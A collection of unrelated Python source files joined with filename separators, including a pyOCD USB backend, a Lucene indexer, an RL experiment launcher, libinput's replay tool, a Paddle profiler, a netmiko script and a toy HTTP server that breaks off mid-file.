def can_parse(http_response):
return 'HugeClassAttrValueParser' in http_response.get_body()
def parse(self):
self.data_to_make_queue_busy = 'A' * (2 ** 30)
self.parse_was_called = True
def clear(self):
return True
|
pyusb_backend.py
|
# pyOCD debugger
# Copyright (c) 2006-2013 Arm Limited
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from .interface import Interface
from .common import (filter_device_by_class, is_known_cmsis_dap_vid_pid)
from ..dap_access_api import DAPAccessIntf
import logging
import os
import threading
import six
from time import sleep
import platform
import errno
log = logging.getLogger('pyusb')
try:
import usb.core
import usb.util
except:
if os.name == "posix" and not os.uname()[0] == 'Darwin':
log.error("PyUSB is required on a Linux Machine")
IS_AVAILABLE = False
else:
IS_AVAILABLE = True
class PyUSB(Interface):
"""
This class provides basic functions to access
a USB HID device using pyusb:
- write/read an endpoint
"""
isAvailable = IS_AVAILABLE
def __init__(self):
super(PyUSB, self).__init__()
self.ep_out = None
self.ep_in = None
self.dev = None
self.intf_number = None
self.serial_number = None
self.kernel_driver_was_attached = False
self.closed = True
self.thread = None
self.rcv_data = []
self.read_sem = threading.Semaphore(0)
self.packet_size = 64
def open(self):
assert self.closed is True
# Get device handle
dev = usb.core.find(custom_match=FindDap(self.serial_number))
if dev is None:
raise DAPAccessIntf.DeviceError("Device %s not found" %
self.serial_number)
# get active config
config = dev.get_active_configuration()
# Get hid interface
interface = None
interface_number = None
for interface in config:
if interface.bInterfaceClass == 0x03:
interface_number = interface.bInterfaceNumber
break
if interface_number is None or interface is None:
raise DAPAccessIntf.DeviceError("Device %s has no hid interface" %
self.serial_number)
# Find endpoints
ep_in, ep_out = None, None
for endpoint in interface:
if endpoint.bEndpointAddress & 0x80:
ep_in = endpoint
else:
ep_out = endpoint
# If there is no EP for OUT then we can use CTRL EP.
# The IN EP is required
if not ep_in:
raise DAPAccessIntf.DeviceError("Unable to open device -"
" no endpoints")
# Detach kernel driver
kernel_driver_was_attached = False
try:
if dev.is_kernel_driver_active(interface_number):
dev.detach_kernel_driver(interface_number)
kernel_driver_was_attached = True
except NotImplementedError as e:
# Some implementations don't don't have kernel attach/detach
log.debug('Exception detaching kernel driver: %s' %
str(e))
# Explicitly claim the interface
try:
usb.util.claim_interface(dev, interface_number)
except usb.core.USBError as exc:
raise six.raise_from(DAPAccessIntf.DeviceError("Unable to open device"), exc)
# Update all class variables if we made it here
self.ep_out = ep_out
self.ep_in = ep_in
self.dev = dev
self.intf_number = interface_number
self.kernel_driver_was_attached = kernel_driver_was_attached
# Start RX thread as the last step
self.closed = False
self.start_rx()
def start_rx(self):
# Flush the RX buffers by reading until timeout exception
try:
while True:
self.ep_in.read(self.ep_in.wMaxPacketSize, 1)
except usb.core.USBError:
# USB timeout expected
pass
# Start RX thread
self.thread = threading.Thread(target=self.rx_task)
self.thread.daemon = True
self.thread.start()
def rx_task(self):
try:
while not self.closed:
self.read_sem.acquire()
if not self.closed:
self.rcv_data.append(self.ep_in.read(self.ep_in.wMaxPacketSize, 10 * 1000))
finally:
# Set last element of rcv_data to None on exit
self.rcv_data.append(None)
@staticmethod
def get_all_connected_interfaces():
"""
returns all the connected devices which matches PyUSB.vid/PyUSB.pid.
returns an array of PyUSB (Interface) objects
"""
# find all cmsis-dap devices
all_devices = usb.core.find(find_all=True, custom_match=FindDap())
# iterate on all devices found
boards = []
for board in all_devices:
new_board = PyUSB()
new_board.vid = board.idVendor
new_board.pid = board.idProduct
new_board.product_name = board.product
new_board.vendor_name = board.manufacturer
new_board.serial_number = board.serial_number
boards.append(new_board)
return boards
def write(self, data):
"""
write data on the OUT endpoint associated to the HID interface
"""
report_size = self.packet_size
if self.ep_out:
report_size = self.ep_out.wMaxPacketSize
for _ in range(report_size - len(data)):
data.append(0)
self.read_sem.release()
if not self.ep_out:
bmRequestType = 0x21 #Host to device request of type Class of Recipient Interface
bmRequest = 0x09 #Set_REPORT (HID class-specific request for transferring data over EP0)
wValue = 0x200 #Issuing an OUT report
wIndex = self.intf_number #mBed Board interface number for HID
self.dev.ctrl_transfer(bmRequestType, bmRequest, wValue, wIndex, data)
return
#raise ValueError('EP_OUT endpoint is NULL')
self.ep_out.write(data)
#logging.debug('sent: %s', data)
return
def read(self):
"""
read data on the IN endpoint associated to the HID interface
"""
while len(self.rcv_data) == 0:
sleep(0)
if self.rcv_data[0] is None:
raise DAPAccessIntf.DeviceError("Device %s read thread exited" %
self.serial_number)
return self.rcv_data.pop(0)
def set_packet_count(self, count):
# No interface level restrictions on count
self.packet_count = count
def set_packet_size(self, size):
self.packet_size = size
def get_serial_number(self):
return self.serial_number
def close(self):
"""
close the interface
"""
assert self.closed is False
log.debug("closing interface")
self.closed = True
self.read_sem.release()
self.thread.join()
assert self.rcv_data[-1] is None
self.rcv_data = []
usb.util.release_interface(self.dev, self.intf_number)
if self.kernel_driver_was_attached:
try:
self.dev.attach_kernel_driver(self.intf_number)
except Exception as exception:
log.warning('Exception attaching kernel driver: %s',
str(exception))
usb.util.dispose_resources(self.dev)
self.ep_out = None
self.ep_in = None
self.dev = None
self.intf_number = None
self.kernel_driver_was_attached = False
self.thread = None
class FindDap(object):
"""CMSIS-DAP match class to be used with usb.core.find"""
def __init__(self, serial=None):
"""Create a new FindDap object with an optional serial number"""
self._serial = serial
def __call__(self, dev):
"""Return True if this is a DAP device, False otherwise"""
# Check if the device class is a valid one for CMSIS-DAP.
if filter_device_by_class(dev.idVendor, dev.idProduct, dev.bDeviceClass):
return False
try:
# First attempt to get the active config. This produces a more direct error
# when you don't have device permissions on Linux
dev.get_active_configuration()
# Now read the product name string.
device_string = dev.product
except usb.core.USBError as error:
if error.errno == errno.EACCES and platform.system() == "Linux":
msg = ("%s while trying to interrogate a USB device "
"(VID=%04x PID=%04x). This can probably be remedied with a udev rule. "
"See <https://github.com/mbedmicro/pyOCD/tree/master/udev> for help." %
(error, dev.idVendor, dev.idProduct))
# If we recognize this device as one that should be CMSIS-DAP, we can raise
# the level of the log message since it's almost certainly a permissions issue.
if is_known_cmsis_dap_vid_pid(dev.idVendor, dev.idProduct):
log.warning(msg)
else:
log.debug(msg)
else:
log.debug("Error accessing USB device (VID=%04x PID=%04x): %s",
dev.idVendor, dev.idProduct, error)
return False
except (IndexError, NotImplementedError) as error:
log.debug("Error accessing USB device (VID=%04x PID=%04x): %s", dev.idVendor, dev.idProduct, error)
return False
if device_string is None:
return False
if device_string.find("CMSIS-DAP") < 0:
return False
if self._serial is not None:
if self._serial != dev.serial_number:
return False
return True
|
IndexFiles.py
|
#!/usr/bin/env python
INDEX_DIR = "IndexFiles.index"
import sys
import os
import lucene
import threading
import time
import jieba
from datetime import datetime
from bs4 import BeautifulSoup
from java.nio.file import Paths
from org.apache.lucene.analysis.miscellaneous import LimitTokenCountAnalyzer
from org.apache.lucene.analysis.standard import StandardAnalyzer
from org.apache.lucene.document import Document, Field, FieldType
from org.apache.lucene.index import \
FieldInfo, IndexWriter, IndexWriterConfig, IndexOptions
from org.apache.lucene.store import SimpleFSDirectory
"""
This class is loosely based on the Lucene (java implementation) demo class
org.apache.lucene.demo.IndexFiles. It will take a directory as an argument
and will index all of the files in that directory and downward recursively.
It will index on the file path, the file name and the file contents. The
resulting Lucene index will be placed in the current directory and called
'index'.
"""
class Ticker(object):
def __init__(self):
self.tick = True
def run(self):
while self.tick:
sys.stdout.write('.')
sys.stdout.flush()
time.sleep(1.0)
class IndexFiles(object):
"""Usage: python IndexFiles <doc_directory>"""
def __init__(self, root, storeDir, analyzer):
if not os.path.exists(storeDir):
os.mkdir(storeDir)
store = SimpleFSDirectory(Paths.get(storeDir))
analyzer = LimitTokenCountAnalyzer(analyzer, 1048576)
config = IndexWriterConfig(analyzer)
config.setOpenMode(IndexWriterConfig.OpenMode.CREATE)
writer = IndexWriter(store, config)
self.indexDocs(root, writer)
ticker = Ticker()
print('commit index')
threading.Thread(target=ticker.run).start()
writer.commit()
writer.close()
ticker.tick = False
print('done')
def indexDocs(self, root, writer):
t1 = FieldType()
t1.setStored(True)
t1.setTokenized(False)
t1.setIndexOptions(IndexOptions.DOCS_AND_FREQS)
t2 = FieldType()
t2.setStored(False)
t2.setTokenized(True)
t2.setIndexOptions(IndexOptions.DOCS_AND_FREQS_AND_POSITIONS)
with open(os.path.join(root, "index.txt"), mode="r", encoding="utf8") as index:
for line in index:
try:
url, path = line.strip().split("\t")
path = os.path.join("./", path)
print("Adding {url},{path}".format(url=url, path=path))
name = os.path.split(path)[-1]
with open(path, mode="r", encoding="utf8") as file:
content = file.read()
soup = BeautifulSoup(content, "html.parser")
# print(soup.title)
title = soup.title.text if soup.title else "No Title!"
content = "".join(soup.findAll(text=True)) # all html tags stripped
content = " ".join(jieba.cut(content))
doc = Document()
doc.add(Field("url", url, t1))
doc.add(Field("path", path, t1))
doc.add(Field("name", name, t1))
doc.add(Field("title", title, t1))
doc.add(Field("content", content, t2))
writer.addDocument(doc)
except Exception as e:
print("Failed in indexDocs:", e)
if __name__ == '__main__':
if len(sys.argv) < 2:
print(IndexFiles.__doc__)
sys.exit(1)
lucene.initVM(vmargs=['-Djava.awt.headless=true'])
print('lucene', lucene.VERSION)
start = datetime.now()
try:
base_dir = os.path.dirname(os.path.abspath(sys.argv[0]))
IndexFiles(sys.argv[1], os.path.join(base_dir, INDEX_DIR),
StandardAnalyzer())
end = datetime.now()
print(end - start)
except Exception as e:
print("Failed: ", e)
raise e
|
walker2d-v2.py
|
import os, sys, signal
import random
import numpy as np
from multiprocessing import Process, Queue, current_process, freeze_support
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--pgmorl', default=False, action='store_true')
parser.add_argument('--ra', default=False, action='store_true')
parser.add_argument('--pfa', default=False, action='store_true')
parser.add_argument('--moead', default=False, action='store_true')
parser.add_argument('--random', default=False, action='store_true')
parser.add_argument('--num-seeds', type=int, default=6)
parser.add_argument('--num-processes',
type=int,
default=1,
help='number of algorithms to be run in parallel (Note: each algorithm needs 4 * num-tasks processors by default, so the total number of processors is 4 * num-tasks * num-processes.)')
parser.add_argument('--save-dir', type=str, default='./results/Walker-v2')
args = parser.parse_args()
random.seed(1000)
commands = []
save_dir = args.save_dir
test_pgmorl = args.pgmorl
test_ra = args.ra
test_random = args.random
test_pfa = args.pfa
test_moead = args.moead
for i in range(args.num_seeds):
seed = random.randint(0, 1000000)
if test_pgmorl:
cmd = 'python morl/run.py '\
'--env-name MO-Walker2d-v2 '\
'--seed {} '\
'--num-env-steps 5000000 '\
'--warmup-iter 80 '\
'--update-iter 20 '\
'--min-weight 0.0 '\
'--max-weight 1.0 '\
'--delta-weight 0.2 '\
'--eval-num 1 '\
'--pbuffer-num 100 '\
'--pbuffer-size 2 '\
'--selection-method prediction-guided '\
'--num-weight-candidates 7 '\
'--num-tasks 6 '\
'--sparsity 1.0 '\
'--obj-rms '\
'--ob-rms '\
'--raw '\
'--save-dir {}/pgmorl/{}/'\
.format(seed, save_dir, i)
commands.append(cmd)
if test_ra:
cmd = 'python morl/run.py '\
'--env-name MO-Walker2d-v2 '\
'--seed {} '\
'--num-env-steps 5000000 '\
'--warmup-iter 80 '\
'--update-iter 20 '\
'--min-weight 0.0 '\
'--max-weight 1.0 '\
'--delta-weight 0.2 '\
'--eval-num 1 '\
'--pbuffer-num 100 '\
'--pbuffer-size 2 '\
'--selection-method ra '\
'--num-tasks 6 '\
'--obj-rms '\
'--ob-rms '\
'--raw '\
'--save-dir {}/ra/{}/'\
.format(seed, save_dir, i)
commands.append(cmd)
if test_random:
cmd = 'python morl/run.py '\
'--env-name MO-Walker2d-v2 '\
'--seed {} '\
'--num-env-steps 5000000 '\
'--warmup-iter 80 '\
'--update-iter 20 '\
'--min-weight 0.0 '\
'--max-weight 1.0 '\
'--delta-weight 0.2 '\
'--eval-num 1 '\
'--pbuffer-num 100 '\
'--pbuffer-size 2 '\
'--selection-method random '\
'--num-tasks 6 '\
'--obj-rms '\
'--ob-rms '\
'--raw '\
'--save-dir {}/random/{}/'\
.format(seed, save_dir, i)
commands.append(cmd)
if test_pfa:
cmd = 'python morl/run.py '\
'--env-name MO-Walker2d-v2 '\
'--seed {} '\
'--num-env-steps 5000000 '\
'--warmup-iter 80 '\
'--update-iter 20 '\
'--min-weight 0.0 '\
'--max-weight 1.0 '\
'--delta-weight 0.2 '\
'--eval-num 1 '\
'--pbuffer-num 100 '\
'--pbuffer-size 2 '\
'--selection-method pfa '\
'--num-tasks 6 '\
'--obj-rms '\
'--ob-rms '\
'--raw '\
'--save-dir {}/pfa/{}/'\
.format(seed, save_dir, i)
commands.append(cmd)
if test_moead:
cmd = 'python morl/run.py '\
'--env-name MO-Walker2d-v2 '\
'--seed {} '\
'--num-env-steps 5000000 '\
'--warmup-iter 80 '\
'--update-iter 20 '\
'--min-weight 0.0 '\
'--max-weight 1.0 '\
'--delta-weight 0.2 '\
'--eval-num 1 '\
'--pbuffer-num 100 '\
'--pbuffer-size 2 '\
'--selection-method moead '\
'--num-tasks 6 '\
'--obj-rms '\
'--ob-rms '\
'--raw '\
'--save-dir {}/moead/{}/'\
.format(seed, save_dir, i)
commands.append(cmd)
def worker(input, output):
for cmd in iter(input.get, 'STOP'):
ret_code = os.system(cmd)
if ret_code != 0:
output.put('killed')
break
output.put('done')
# Create queues
task_queue = Queue()
done_queue = Queue()
# Submit tasks
for cmd in commands:
task_queue.put(cmd)
# Submit stop signals
for i in range(args.num_processes):
task_queue.put('STOP')
# Start worker processes
for i in range(args.num_processes):
Process(target=worker, args=(task_queue, done_queue)).start()
# Get and print results
for i in range(args.num_processes):
print(f'Process {i}', done_queue.get())
|
libinput-replay.py
|
#!/usr/bin/env python3
# vim: set expandtab shiftwidth=4:
# -*- Mode: python; coding: utf-8; indent-tabs-mode: nil -*- */
#
# Copyright © 2018 Red Hat, Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice (including the next
# paragraph) shall be included in all copies or substantial portions of the
# Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
import os
import sys
import time
import math
import multiprocessing
import argparse
from pathlib import Path
try:
import libevdev
import yaml
import pyudev
except ModuleNotFoundError as e:
print("Error: {}".format(e), file=sys.stderr)
print(
"One or more python modules are missing. Please install those "
"modules and re-run this tool."
)
sys.exit(1)
SUPPORTED_FILE_VERSION = 1
def error(msg, **kwargs):
print(msg, **kwargs, file=sys.stderr)
class YamlException(Exception):
pass
def fetch(yaml, key):
"""Helper function to avoid confusing a YAML error with a
normal KeyError bug"""
try:
return yaml[key]
except KeyError:
raise YamlException("Failed to get '{}' from recording.".format(key))
def check_udev_properties(yaml_data, uinput):
"""
Compare the properties our new uinput device has with the ones from the
recording and ring the alarm bell if one of them is off.
"""
yaml_udev_section = fetch(yaml_data, "udev")
yaml_udev_props = fetch(yaml_udev_section, "properties")
yaml_props = {
k: v for (k, v) in [prop.split("=", maxsplit=1) for prop in yaml_udev_props]
}
try:
# We don't assign this one to virtual devices
del yaml_props["LIBINPUT_DEVICE_GROUP"]
except KeyError:
pass
# give udev some time to catch up
time.sleep(0.2)
context = pyudev.Context()
udev_device = pyudev.Devices.from_device_file(context, uinput.devnode)
for name, value in udev_device.properties.items():
if name in yaml_props:
if yaml_props[name] != value:
error(
f"Warning: udev property mismatch: recording has {name}={yaml_props[name]}, device has {name}={value}"
)
del yaml_props[name]
else:
# The list of properties we add to the recording, see libinput-record.c
prefixes = (
"ID_INPUT",
"LIBINPUT",
"EVDEV_ABS",
"MOUSE_DPI",
"POINTINGSTICK_",
)
for prefix in prefixes:
if name.startswith(prefix):
error(f"Warning: unexpected property: {name}={value}")
# the ones we found above were removed from the dict
for name, value in yaml_props.items():
error(f"Warning: device is missing recorded udev property: {name}={value}")
def create(device):
evdev = fetch(device, "evdev")
d = libevdev.Device()
d.name = fetch(evdev, "name")
ids = fetch(evdev, "id")
if len(ids) != 4:
raise YamlException("Invalid ID format: {}".format(ids))
d.id = dict(zip(["bustype", "vendor", "product", "version"], ids))
codes = fetch(evdev, "codes")
for evtype, evcodes in codes.items():
for code in evcodes:
data = None
if evtype == libevdev.EV_ABS.value:
values = fetch(evdev, "absinfo")[code]
absinfo = libevdev.InputAbsInfo(
minimum=values[0],
maximum=values[1],
fuzz=values[2],
flat=values[3],
resolution=values[4],
)
data = absinfo
elif evtype == libevdev.EV_REP.value:
if code == libevdev.EV_REP.REP_DELAY.value:
data = 500
elif code == libevdev.EV_REP.REP_PERIOD.value:
data = 20
d.enable(libevdev.evbit(evtype, code), data=data)
properties = fetch(evdev, "properties")
for prop in properties:
d.enable(libevdev.propbit(prop))
uinput = d.create_uinput_device()
check_udev_properties(device, uinput)
return uinput
def print_events(devnode, indent, evs):
devnode = os.path.basename(devnode)
for e in evs:
print(
"{}: {}{:06d}.{:06d} {} / {:<20s} {:4d}".format(
devnode,
" " * (indent * 8),
e.sec,
e.usec,
e.type.name,
e.code.name,
e.value,
)
)
def replay(device, verbose):
events = fetch(device, "events")
if events is None:
return
uinput = device["__uinput"]
# The first event may have a nonzero offset but we want to replay
# immediately regardless. When replaying multiple devices, the first
# offset is the offset from the first event on any device.
offset = time.time() - device["__first_event_offset"]
if offset < 0:
error("WARNING: event time offset is in the future, refusing to replay")
return
# each 'evdev' set contains one SYN_REPORT so we only need to check for
# the time offset once per event
for event in events:
try:
evdev = fetch(event, "evdev")
except YamlException:
continue
(sec, usec, evtype, evcode, value) = evdev[0]
evtime = sec + usec / 1e6 + offset
now = time.time()
if evtime - now > 150 / 1e6: # 150 µs error margin
time.sleep(evtime - now - 150 / 1e6)
evs = [
libevdev.InputEvent(
libevdev.evbit(e[2], e[3]), value=e[4], sec=e[0], usec=e[1]
)
for e in evdev
]
uinput.send_events(evs)
if verbose:
print_events(uinput.devnode, device["__index"], evs)
def first_timestamp(device):
events = fetch(device, "events")
for e in events or []:
try:
evdev = fetch(e, "evdev")
(sec, usec, *_) = evdev[0]
return sec + usec / 1.0e6
except YamlException:
pass
return None
def wrap(func, *args):
try:
func(*args)
except KeyboardInterrupt:
pass
def loop(args, recording):
devices = fetch(recording, "devices")
first_timestamps = tuple(
filter(lambda x: x is not None, [first_timestamp(d) for d in devices])
)
# All devices need to start replaying at the same time, so let's find
# the very first event and offset everything by that timestamp.
toffset = min(first_timestamps or [math.inf])
for idx, d in enumerate(devices):
uinput = create(d)
print("{}: {}".format(uinput.devnode, uinput.name))
d["__uinput"] = uinput # cheaper to hide it in the dict then work around it
d["__index"] = idx
d["__first_event_offset"] = toffset
if not first_timestamps:
input("No events in recording. Hit enter to quit")
return
while True:
input("Hit enter to start replaying")
processes = []
for d in devices:
p = multiprocessing.Process(target=wrap, args=(replay, d, args.verbose))
processes.append(p)
for p in processes:
p.start()
for p in processes:
p.join()
del processes
def create_device_quirk(device):
try:
quirks = fetch(device, "quirks")
if not quirks:
return None
except YamlException:
return None
# Where the device has a quirk, we match on name, vendor and product.
# That's the best match we can assemble here from the info we have.
evdev = fetch(device, "evdev")
name = fetch(evdev, "name")
id = fetch(evdev, "id")
quirk = (
"[libinput-replay {name}]\n"
"MatchName={name}\n"
"MatchVendor=0x{id[1]:04X}\n"
"MatchProduct=0x{id[2]:04X}\n"
).format(name=name, id=id)
quirk += "\n".join(quirks)
return quirk
def setup_quirks(recording):
devices = fetch(recording, "devices")
overrides = None
quirks = []
for d in devices:
if "quirks" in d:
quirk = create_device_quirk(d)
if quirk:
quirks.append(quirk)
if not quirks:
return None
overrides = Path("/etc/libinput/local-overrides.quirks")
if overrides.exists():
print(
"{} exists, please move it out of the way first".format(overrides),
file=sys.stderr,
)
sys.exit(1)
overrides.parent.mkdir(exist_ok=True)
with overrides.open("w+") as fd:
fd.write("# This file was generated by libinput replay\n")
fd.write("# Unless libinput replay is running right now, remove this file.\n")
fd.write("\n\n".join(quirks))
return overrides
def check_file(recording):
version = fetch(recording, "version")
if version != SUPPORTED_FILE_VERSION:
raise YamlException(
"Invalid file format: {}, expected {}".format(
version, SUPPORTED_FILE_VERSION
)
)
ndevices = fetch(recording, "ndevices")
devices = fetch(recording, "devices")
if ndevices != len(devices):
error(
"WARNING: truncated file, expected {} devices, got {}".format(
ndevices, len(devices)
)
)
def main():
parser = argparse.ArgumentParser(description="Replay a device recording")
parser.add_argument(
"recording",
metavar="recorded-file.yaml",
type=str,
help="Path to device recording",
)
parser.add_argument("--verbose", action="store_true")
args = parser.parse_args()
quirks_file = None
try:
with open(args.recording) as f:
y = yaml.safe_load(f)
check_file(y)
quirks_file = setup_quirks(y)
loop(args, y)
except KeyboardInterrupt:
pass
except (PermissionError, OSError) as e:
error("Error: failed to open device: {}".format(e))
except YamlException as e:
error("Error: failed to parse recording: {}".format(e))
finally:
if quirks_file:
quirks_file.unlink()
if __name__ == "__main__":
main()
|
profiler.py
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint: disable=doc-string-missing
import os
import sys
import logging
if sys.version_info.major == 2:
import Queue
elif sys.version_info.major == 3:
import queue as Queue
else:
raise Exception("Error Python version")
from time import time as _time
import time
import threading
import multiprocessing
_LOGGER = logging.getLogger(__name__)
_LOGGER.propagate = False
class PerformanceTracer(object):
def __init__(self, is_thread_mode, interval_s, server_worker_num):
self._is_thread_mode = is_thread_mode
if is_thread_mode:
# Because the Channel in the thread mode cannot be
# accessed across processes, when using thread mode,
# the PerformanceTracer is also the thread mode.
# However, performance may be affected by GIL.
self._data_buffer = Queue.Queue()
else:
self._data_buffer = multiprocessing.Manager().Queue()
self._interval_s = interval_s
self._thrd = None
self._proc = None
self._channels = []
# The size of data in Channel will not exceed server_worker_num
self._server_worker_num = server_worker_num
def data_buffer(self):
return self._data_buffer
def start(self):
if self._is_thread_mode:
self._thrd = threading.Thread(
target=self._trace_func, args=(self._channels, ))
self._thrd.daemon = True
self._thrd.start()
else:
self._proc = multiprocessing.Process(
target=self._trace_func, args=(self._channels, ))
self._proc.daemon = True
self._proc.start()
def set_channels(self, channels):
self._channels = channels
def _trace_func(self, channels):
all_actions = ["in", "prep", "midp", "postp", "out"]
calcu_actions = ["prep", "midp", "postp"]
while True:
op_cost = {}
err_request = []
err_count = 0
_LOGGER.info("==================== TRACER ======================")
# op
while True:
try:
item = self._data_buffer.get_nowait()
name = item["name"]
actions = item["actions"]
if name == "DAG":
succ = item["succ"]
req_id = item["id"]
if not succ:
err_count += 1
err_request.append(req_id)
if name not in op_cost:
op_cost[name] = {}
for action, cost in actions.items():
if action not in op_cost[name]:
op_cost[name][action] = []
op_cost[name][action].append(cost)
except Queue.Empty:
break
if len(op_cost) != 0:
for name in op_cost:
tot_cost, calcu_cost = 0.0, 0.0
for action, costs in op_cost[name].items():
op_cost[name][action] = sum(costs) / (1e3 * len(costs))
tot_cost += op_cost[name][action]
if name != "DAG":
_LOGGER.info("Op({}):".format(name))
for action in all_actions:
if action in op_cost[name]:
_LOGGER.info("\t{}[{} ms]".format(
action, op_cost[name][action]))
for action in calcu_actions:
if action in op_cost[name]:
calcu_cost += op_cost[name][action]
_LOGGER.info("\tidle[{}]".format(1 - 1.0 * calcu_cost /
tot_cost))
if "DAG" in op_cost:
calls = op_cost["DAG"].values()
calls.sort()
tot = len(calls)
qps = 1.0 * tot / self._interval_s
ave_cost = sum(calls) / tot
latencys = [50, 60, 70, 80, 90, 95, 99]
_LOGGER.info("DAGExecutor:")
_LOGGER.info("\tQuery count[{}]".format(tot))
_LOGGER.info("\tQPS[{} q/s]".format(qps))
_LOGGER.info("\tSucc[{}]".format(1 - 1.0 * err_count / tot))
_LOGGER.info("\tError req[{}]".format(", ".join(
[str(x) for x in err_request])))
_LOGGER.info("\tLatency:")
_LOGGER.info("\t\tave[{} ms]".format(ave_cost))
for latency in latencys:
_LOGGER.info("\t\t.{}[{} ms]".format(latency, calls[int(
tot * latency / 100.0)]))
# channel
_LOGGER.info("Channel (server worker num[{}]):".format(
self._server_worker_num))
for channel in channels:
_LOGGER.info("\t{}(In: {}, Out: {}) size[{}/{}]".format(
channel.name,
channel.get_producers(),
channel.get_consumers(),
channel.size(), channel.get_maxsize()))
time.sleep(self._interval_s)
class UnsafeTimeProfiler(object):
""" thread unsafe profiler """
def __init__(self):
self.pid = os.getpid()
self.print_head = 'PROFILE\tpid:{}\t'.format(self.pid)
self.time_record = [self.print_head]
self._enable = False
def enable(self, enable):
self._enable = enable
def record(self, name):
if self._enable is False:
return
timestamp = int(round(_time() * 1000000))
self.time_record.append('{}:{} '.format(name, timestamp))
return timestamp
def print_profile(self):
if self._enable is False:
return
sys.stderr.write(self.gen_profile_str())
def gen_profile_str(self):
if self._enable is False:
return
self.time_record.append('\n')
profile_str = ''.join(self.time_record)
self.time_record = [self.print_head]
return profile_str
class TimeProfiler(object):
def __init__(self):
self._pid = os.getpid()
self._print_head = 'PROFILE\tpid:{}\t'.format(self._pid)
self._time_record = Queue.Queue()
self._enable = False
self._lock = threading.Lock()
def enable(self, enable):
self._enable = enable
def record(self, name_with_tag):
if self._enable is False:
return
timestamp = int(round(_time() * 1000000))
name_with_tag = name_with_tag.split("_")
tag = name_with_tag[-1]
name = '_'.join(name_with_tag[:-1])
with self._lock:
self._time_record.put((name, tag, timestamp))
return timestamp
def print_profile(self):
if self._enable is False:
return
sys.stderr.write(self.gen_profile_str())
def gen_profile_str(self):
if self._enable is False:
return
print_str = self._print_head
tmp = {}
with self._lock:
while not self._time_record.empty():
name, tag, timestamp = self._time_record.get()
if name in tmp:
ptag, ptimestamp = tmp.pop(name)
print_str += "{}_{}:{} ".format(name, ptag, ptimestamp)
print_str += "{}_{}:{} ".format(name, tag, timestamp)
else:
tmp[name] = (tag, timestamp)
print_str = "\n{}\n".format(print_str)
for name, item in tmp.items():
tag, timestamp = item
self._time_record.put((name, tag, timestamp))
return print_str
|
ex6.py
|
#! /usr/bin/env python
from datetime import datetime
import threading
import django
django.setup()
from net_system.models import NetworkDevice, Credentials
from netmiko import ConnectHandler
def show_version(device):
creds = device.credentials
rconn = ConnectHandler(device_type=device.device_type, ip=device.ip_address, username=creds.username, password=creds.password, port=device.port, secret='')
print()
print("*" * 80)
print(device)
print("*" * 80)
print(rconn.send_command('show version'))
print("*" * 80)
print()
rconn.disconnect()
def main():
my_devices = NetworkDevice.objects.all()
start_time = datetime.now()
for device in my_devices:
my_thread = threading.Thread(target=show_version, args = (device,))
my_thread.start()
main_thread = threading.currentThread()
for th in threading.enumerate():
if th != main_thread:
print(th)
th.join()
print("Elapsed time: {}".format(datetime.now()-start_time))
if __name__ == "__main__":
main()
|
MyWevServer.py
|
# coding:utf-8
import socket
import re
import sys
from multiprocessing import Process
# 设置静态文件根目录
HTML_ROOT_DIR = "./html"
PYTHON_ROOT_DIR = "./wsgibins"
class HTTPServer(object):
""""""
def __init__(self, application):
self.app = application
self.server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
def bind(self, address):
self.server_socket.bind(address)
def start(self):
self.server_socket.listen(128)
while True:
client_socket, client_address = self.server_socket.accept()
# print("[%s, %s]用户连接上了" % (client_address[0],client_address[1]))
print("[%s, %s]用户连接上了" % client_address)
handle_client_process = Process(target=self.handle_client, args=(client_socket,))
handle_client_process.start()
client_socket.close()
def start_response(self, status, headers):
server_headers = [
("Server", "My Server")
]
self.headers_set = [status, server_headers+headers]
def handle_client(self, client_socket):
"""处理客户端请求"""
# 获取客户端请求数据
request_data = client_socket.recv(1024)
print("request data:", request_data)
request_lines = request_data.splitlines()
for line in request_lines:
print(line)
# 解析请求报文
# 'GET / HTTP/1.1'
request_start_line = request_lines[0]
# 提取用户请求的文件名
print("*"*10)
print(request_start_line.decode("utf-8"))
file_name = re.match(r"\w+ +(/[^ ]*) ", request_start_line.decode("utf-8")).group(1)
environ = {
"PATH_INFO":file_name
}
response_body = self.app(environ, self.start_response)
response = "HTTP/1.1 " + self.headers_set[0] + "\r\n"
if len(self.headers_set)>1:
for header in self.headers_set[1]:
response += "%s: %s\r\n" % header
response += "\r\n"
response += response_body
# 向客户端返回响应数据
client_socket.send(bytes(response, "utf-8"))
# 关闭客户端连接
client_socket.close()
def main():
# sys.path.insert(1, PYTHON_ROOT_DIR)
